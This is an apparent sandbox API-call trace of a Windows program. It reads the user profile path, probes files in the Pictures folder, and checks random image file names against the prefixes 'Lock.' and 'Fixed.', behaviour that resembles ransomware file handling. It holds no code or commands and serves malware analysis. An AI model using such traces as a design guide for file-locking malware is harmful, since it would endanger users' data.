[0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0211.686] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0211.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a750d0 [0211.687] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/ul6W7nkKmk8Vcoms6H.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ul6W7nkKmk8Vcoms6H.gif", lpFilePart=0x8cf650*="ul6W7nkKmk8Vcoms6H.gif") returned 0x2f [0211.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a750d0 | out: hHeap=0x2af0000) returned 1 [0211.687] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ul6W7nkKmk8Vcoms6H.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\ul6w7nkkmk8vcoms6h.gif")) returned 0xffffffff [0211.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.688] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0211.688] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.688] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.688] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v1scJjcpwcvzTSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.688] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1scJjcpwcvzTSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.688] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="scJjcpwcvzTSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cJjcpwcvzTSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JjcpwcvzTSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jcpwcvzTSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cpwcvzTSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pwcvzTSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wcvzTSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cvzTSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vzTSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zTSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TSqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SqU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qU.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0211.689] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0211.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0211.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2aa6450 [0211.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v1scJjcpwcvzTSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1scJjcpwcvzTSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="scJjcpwcvzTSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cJjcpwcvzTSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JjcpwcvzTSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jcpwcvzTSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cpwcvzTSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pwcvzTSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wcvzTSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cvzTSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vzTSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zTSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TSqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SqU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qU.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6488 [0211.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6488 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa65a0 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0211.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.691] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0211.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.691] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0211.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0211.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0211.692] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa780 [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa720 [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.692] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0211.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0211.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0211.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0211.694] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa738 [0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0211.694] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 